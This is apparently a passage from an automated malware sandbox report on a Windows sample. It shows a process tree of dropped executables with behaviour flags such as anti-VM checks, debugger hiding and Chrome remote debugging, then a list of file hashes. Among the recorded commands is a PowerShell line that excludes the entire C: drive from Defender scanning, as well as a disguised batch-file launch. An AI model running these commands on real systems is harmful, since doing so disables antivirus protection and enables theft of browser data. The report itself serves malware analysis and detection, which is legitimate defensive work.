                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10348320101\FjbTOQC.exe"
                                                                                                                            3⤵
                                                                                                                              PID:6632
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10348330101\kDveTWY.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10348330101\kDveTWY.exe"
                                                                                                                              3⤵
                                                                                                                                PID:6176
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                  4⤵
                                                                                                                                    PID:2344
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:544
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                      4⤵
                                                                                                                                        PID:4192
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                        4⤵
                                                                                                                                          PID:7156
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10348340101\TbV75ZR.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10348340101\TbV75ZR.exe"
                                                                                                                                        3⤵
                                                                                                                                          PID:5936
                                                                                                                                          • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                            "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                                                                                                                                            4⤵
                                                                                                                                              PID:2528
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10348350101\7b35p_003.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10348350101\7b35p_003.exe"
                                                                                                                                            3⤵
                                                                                                                                              PID:400
                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                4⤵
                                                                                                                                                  PID:1776
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                    5⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:3680
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  "C:\Windows\system32\svchost.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4040
                                                                                                                                                    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                                      "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                                      5⤵
                                                                                                                                                        PID:5020
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell Remove-MpPreference -ExclusionPath C:\
                                                                                                                                                          6⤵
                                                                                                                                                            PID:2860
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                                          5⤵
                                                                                                                                                            PID:1640
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10348360101\oalJJxv.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10348360101\oalJJxv.exe"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5672
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10348380101\q4jfn3p.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10348380101\q4jfn3p.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:13072
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:13136
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                                  PID:6788
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff83607dcf8,0x7ff83607dd04,0x7ff83607dd10
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:7148
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,6953755389238570660,5062811159430548020,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2024 /prefetch:2
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:6308
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2132,i,6953755389238570660,5062811159430548020,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2260 /prefetch:3
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:5420
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,6953755389238570660,5062811159430548020,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2396 /prefetch:8
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:3228
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,6953755389238570660,5062811159430548020,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3248 /prefetch:1
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                                            PID:4220
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,6953755389238570660,5062811159430548020,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3388 /prefetch:1
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                                            PID:6768
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,6953755389238570660,5062811159430548020,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4432 /prefetch:2
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                                            PID:5516
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4652,i,6953755389238570660,5062811159430548020,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4604 /prefetch:1
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                                            PID:5756
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4888,i,6953755389238570660,5062811159430548020,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4864 /prefetch:8
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:6376
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10348390101\da749142d6.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10348390101\da749142d6.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2524
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:3756
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\MsWin32tart.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:628
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\MsWin32tart.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\MsWin32tart.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:1680
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5888
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5144
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:2660
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\MsWin32tart.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\MsWin32tart.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:5764
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5936
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:6172
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:6464
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\MsWin32tart.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\MsWin32tart.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:13056
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:13104
                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                      "C:\Windows\System32\svchost.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5684
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3900 -ip 3900
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2188
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4288

                                                                                                                                                                                          Network

                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                          Downloads

                                                                                                                                                                                          • C:\Temp\j4HzL6rM1.hta

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            779B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            39c8cd50176057af3728802964f92d49

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            68fc10a10997d7ad00142fc0de393fe3500c8017

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            40B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            13e85db7ab7bd0131b6d7b372eb6b3cb

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            5bd031c1d79faee9f5b180576fb2ba73afd236a9

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            96bf5616e02db2a7d71c4eb64ee4bf0ca8a06700e34ffa47bdc9c02f97092e20

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            63e735544156689c62d6d5cffe428e6cf749066239e69dae910f08b89aa9f87efbeaf9ba5fa16d2644d16478ee854903270d4e330ddf89ea1bae6d54c98cb029

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            2B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            d751713988987e9331980363e24189ce

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            79KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            656fb33ed5f9c72ee705ca40a0507620

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            1bd889a1eeddbfe37c6260b52703be3f1897dcf4

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            765a2fe6055e186a352e1218c49b49c6aab887d31faead27c681b0793ab53f81

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            fbd40e4fcc7ee17f7464d4f23b5d4e2352cfc526a587f603f374942657e33383c7853a4dea249671019eaaec0c3eeae87bac78d9c2f738a2d7770b35565e663b

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            2KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            25604a2821749d30ca35877a7669dff9

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            49c624275363c7b6768452db6868f8100aa967be

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            280B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            a2ba318785c4a9521adadbc2695e870d

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            6d66555e86fe9f11f95baa2cf60ed4b3f8da8c4e

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            abe8231d6e636bd2dead2672a7a621ab915cbd2fe0cb8ac191d9d289a9e85572

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            dfcb60579c6b18fd01e2c800997484c8f1299b52c04f34bc1612d1abd7427ed63ced1a27a36f79ddbec952fa9eabd846d9f9e2d67d668081d01977b07df50646

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            280B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            998db8a9f40f71e2f3d9e19aac4db4a9

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            dade0e68faef54a59d68ae8cb3b8314b6947b6d7

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            1b28744565eb600485d9800703f2fb635ecf4187036c12d47f86bbd1e078e06b

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            0e66fd26a11507f78fb1b173fd50555dbd95b0d330e095cdd93206757c6af2780ece914a11a23cd4c840636a59470f44c6db35fa392303fb583806264e652016

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            2B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            107KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            40e2018187b61af5be8caf035fb72882

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            72a0b7bcb454b6b727bf90da35879b3e9a70621e

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            16B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            46295cac801e5d4857d09837238a6394

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            23B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            3fd11ff447c1ee23538dc4d9724427a3

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            1335e6f71cc4e3cf7025233523b4760f8893e9c9

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            40B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            20d4b8fa017a12a108c87f540836e250

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            16KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            1e2817acb239b7ab1b98ab2f515e5f03

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            73228ebd9974406e0c1b153192fd27cb6e57e76a

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            136d7e801879d9335a90936f198c4ec083c2bd71716f6b42152da9d4269a4c1b

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            1f083fe33f73bf392be8023f6871d0bde880883b2d774af46aae175facecd2b385aae66208274f100d76b93b34e57c3caea5a031fe7adad7761e1dc8e616ad0e

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            36KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            df0ff0189de1f70cb47bf7fbf71bee28

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            49f45517ecd65dc6d7d2446370d4b6d93db8abf8

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            667abf3cca0e1f8219d6d4b5fc252171cd18a76899a419f198f6843ba7a9ebe4

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            2fbfc2ffff6b0a3b1a546a641422a3e73f5a1f0067455af75c0c22ea7c3a84266b793493ebb848b8cb8959aed34bd62e8d06ad254168fe6c87adf682a1f1e842

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            327B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            3b76c11bbed02e31d06c3fe7a163577f

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            c722a778ad50f1b55fbddf2776890afd43bf4e43

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            25d06fb909829f3c6b531f172fc773fd0f0d98398c38e100c93318f5254d06a3

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            0584e11eb33104aa36aa86ac4cfe9cde831fa56a63f45c5db80a430b81e4e2a6274626663f58407139123cfc91c09c31d893ba60ad29da56c14e564b3d646bd9

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            22KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            3b1403471b43ffac6f9244eb3793c8ac

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            35bc780c09699111ea79cb83b34f4009c0098b3c

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            81ec16ad943d9c43ecf03e76f20f5ecf2afb73ccbf619bb3060553b0621c1346

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            3e0521ade15a7544cee0d8ddcaa2b3be44d794e11c448b5b7f8406c1226937b2f7bf8cc2f17d11341d557f6f4d6e877e961093e4cf48c1d1ca14328e6f34fdef

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\dcd4aabe-aa4e-429f-b115-a57d703427aa.tmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            5058f1af8388633f609cadb75a75dc9d

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            41KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            e3740f7c4484fbde4c3a684a4f9b38e8

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            57639041c5814468651e7c355a5c1e1f7b5f2e46

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            3170a907f8f8e79270bf19f8f146b591abfb112f60e52762c1790f64a4a88b1c

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            822faaafd0eadcec5abbbb868893e9ae747c22ca13f0fa0d175e79b20651d2677db162edec8b3b1a72553c67c355275728c28eeeb0efee3a0f36f24b27961e12

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            40KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            b4f0945f8224659ab80ee2505cf2b6f5

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            f80f6c3a05a211db7f76ecbc061c700fae6e0469

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            38773f52ef2f6356beb94e915d79a24ef093bec5ec2ca40355e5045937944878
